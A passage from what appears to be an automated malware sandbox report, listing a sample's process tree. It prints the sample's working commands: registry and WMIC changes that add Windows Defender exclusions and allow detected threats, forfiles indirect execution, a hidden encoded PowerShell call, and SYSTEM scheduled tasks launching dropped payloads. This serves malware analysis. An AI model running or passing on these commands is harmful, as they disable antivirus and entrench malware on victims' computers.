                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4328
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3288
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ckxpMdyqhRUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ckxpMdyqhRUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ddnwjRIZU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ddnwjRIZU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gciJNuXVjRBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gciJNuXVjRBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qYJBHbpkHzRQcSrnQqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qYJBHbpkHzRQcSrnQqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wTflokFyPGEtC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wTflokFyPGEtC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WxypfzFwjxKJMVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WxypfzFwjxKJMVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\NTNbheIUXZDfWHtWv\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\NTNbheIUXZDfWHtWv\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SNvkYnVggVmXPOfY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SNvkYnVggVmXPOfY\" /t REG_DWORD /d 0 /reg:64;"
                                              2⤵
                                              • Drops file in System32 directory
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5036
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ckxpMdyqhRUn" /t REG_DWORD /d 0 /reg:32
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4900
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ckxpMdyqhRUn" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                    PID:4888
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ckxpMdyqhRUn" /t REG_DWORD /d 0 /reg:64
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3876
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ddnwjRIZU" /t REG_DWORD /d 0 /reg:32
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1480
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ddnwjRIZU" /t REG_DWORD /d 0 /reg:64
                                                  3⤵
                                                    PID:908
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gciJNuXVjRBU2" /t REG_DWORD /d 0 /reg:32
                                                    3⤵
                                                      PID:4428
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gciJNuXVjRBU2" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3544
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qYJBHbpkHzRQcSrnQqR" /t REG_DWORD /d 0 /reg:32
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1444
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qYJBHbpkHzRQcSrnQqR" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:964
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wTflokFyPGEtC" /t REG_DWORD /d 0 /reg:32
                                                      3⤵
                                                        PID:1052
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wTflokFyPGEtC" /t REG_DWORD /d 0 /reg:64
                                                        3⤵
                                                          PID:1656
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WxypfzFwjxKJMVVB /t REG_DWORD /d 0 /reg:32
                                                          3⤵
                                                            PID:1540
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WxypfzFwjxKJMVVB /t REG_DWORD /d 0 /reg:64
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2064
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                            3⤵
                                                              PID:2668
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3756
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                              3⤵
                                                                PID:5072
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4736
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\NTNbheIUXZDfWHtWv /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                  PID:3552
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\NTNbheIUXZDfWHtWv /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                    PID:3496
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SNvkYnVggVmXPOfY /t REG_DWORD /d 0 /reg:32
                                                                    3⤵
                                                                      PID:2620
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SNvkYnVggVmXPOfY /t REG_DWORD /d 0 /reg:64
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2532
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /CREATE /TN "gEJJDsRJD" /SC once /ST 01:44:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                    2⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:3656
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /run /I /tn "gEJJDsRJD"
                                                                    2⤵
                                                                      PID:3448
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /DELETE /F /TN "gEJJDsRJD"
                                                                      2⤵
                                                                        PID:1244
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "mdpkoZqdjxXxbjrkF" /SC once /ST 00:37:34 /RU "SYSTEM" /TR "\"C:\Windows\Temp\SNvkYnVggVmXPOfY\pcxwHASJkykFZux\smDMtac.exe\" MU /vwENdidra 525403 /S" /V1 /F
                                                                        2⤵
                                                                        • Drops file in Windows directory
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:600
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "mdpkoZqdjxXxbjrkF"
                                                                        2⤵
                                                                          PID:2292
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 608
                                                                          2⤵
                                                                          • Program crash
                                                                          PID:2408
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                        1⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1652
                                                                        • C:\Windows\system32\gpupdate.exe
                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                          2⤵
                                                                            PID:584
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                          1⤵
                                                                            PID:2316
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                            1⤵
                                                                              PID:2240
                                                                            • C:\Windows\system32\gpscript.exe
                                                                              gpscript.exe /RefreshSystemParam
                                                                              1⤵
                                                                                PID:1968
                                                                              • C:\Windows\Temp\SNvkYnVggVmXPOfY\pcxwHASJkykFZux\smDMtac.exe
                                                                                C:\Windows\Temp\SNvkYnVggVmXPOfY\pcxwHASJkykFZux\smDMtac.exe MU /vwENdidra 525403 /S
                                                                                1⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Drops Chrome extension
                                                                                • Drops file in System32 directory
                                                                                • Drops file in Program Files directory
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Modifies data under HKEY_USERS
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:2568
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                  2⤵
                                                                                    PID:4384
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                      3⤵
                                                                                      • Indirect Command Execution
                                                                                      PID:792
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                        4⤵
                                                                                          PID:340
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                            5⤵
                                                                                              PID:3984
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                          3⤵
                                                                                          • Indirect Command Execution
                                                                                          PID:4060
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                            4⤵
                                                                                              PID:4916
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                5⤵
                                                                                                  PID:4128
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                              3⤵
                                                                                              • Indirect Command Execution
                                                                                              PID:1596
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                4⤵
                                                                                                  PID:4328
                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:3288
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                3⤵
                                                                                                • Indirect Command Execution
                                                                                                PID:3484
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                  4⤵
                                                                                                    PID:5060
                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                      5⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:2752
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                  3⤵
                                                                                                  • Indirect Command Execution
                                                                                                  PID:2232
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                    4⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2628
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                      5⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2596
                                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                        6⤵
                                                                                                          PID:4740
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "bTArmSeJIYcKxkniKL"
                                                                                                  2⤵
                                                                                                    PID:2724
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                    2⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:772
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                      3⤵
                                                                                                      • Indirect Command Execution
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:3576
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:2172
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                          5⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2664
                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                            6⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:5076
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ddnwjRIZU\szlvDY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OqIZXRFRYfwECJZ" /V1 /F
                                                                                                    2⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:3552
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "OqIZXRFRYfwECJZ2" /F /xml "C:\Program Files (x86)\ddnwjRIZU\FJDCUrh.xml" /RU "SYSTEM"
                                                                                                    2⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2668
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /END /TN "OqIZXRFRYfwECJZ"
                                                                                                    2⤵
                                                                                                      PID:1968
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /DELETE /F /TN "OqIZXRFRYfwECJZ"
                                                                                                      2⤵
                                                                                                        PID:4792
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "fZALXkCXEVppCe" /F /xml "C:\Program Files (x86)\gciJNuXVjRBU2\PwuUcdb.xml" /RU "SYSTEM"
                                                                                                        2⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2964
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "LCltHDGSknFbe2" /F /xml "C:\ProgramData\WxypfzFwjxKJMVVB\RGjNhdW.xml" /RU "SYSTEM"
                                                                                                        2⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:4972
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "LVKzlvKjOSCFNpfxb2" /F /xml "C:\Program Files (x86)\qYJBHbpkHzRQcSrnQqR\asxHmuw.xml" /RU "SYSTEM"
                                                                                                        2⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:4296
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "NYeAGlmwPYoUWJfzKHt2" /F /xml "C:\Program Files (x86)\wTflokFyPGEtC\IQAHyyp.xml" /RU "SYSTEM"
                                                                                                        2⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2056
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "KKDeoVLXnKsFKujWq" /SC once /ST 02:15:07 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\SNvkYnVggVmXPOfY\bGNxSCGY\btHSSyM.dll\",#1 /XktdidSeTq 525403" /V1 /F
                                                                                                        2⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:784
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "KKDeoVLXnKsFKujWq"
                                                                                                        2⤵
                                                                                                          PID:492
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /DELETE /F /TN "mdpkoZqdjxXxbjrkF"
                                                                                                          2⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:3848
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2568 -s 2416
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:3060
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2952 -ip 2952
                                                                                                        1⤵
                                                                                                          PID:2320
                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SNvkYnVggVmXPOfY\bGNxSCGY\btHSSyM.dll",#1 /XktdidSeTq 525403
                                                                                                          1⤵
                                                                                                            PID:4416
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SNvkYnVggVmXPOfY\bGNxSCGY\btHSSyM.dll",#1 /XktdidSeTq 525403
                                                                                                              2⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Loads dropped DLL
                                                                                                              • Enumerates system info in registry
                                                                                                              PID:3288
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "KKDeoVLXnKsFKujWq"
                                                                                                                3⤵
                                                                                                                  PID:1456
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4868 -ip 4868
                                                                                                              1⤵
                                                                                                                PID:3272
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2568 -ip 2568
                                                                                                                1⤵
                                                                                                                  PID:4384

                                                                                                                Network

                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

                                                                                                                  Filesize

                                                                                                                  129B

                                                                                                                  MD5

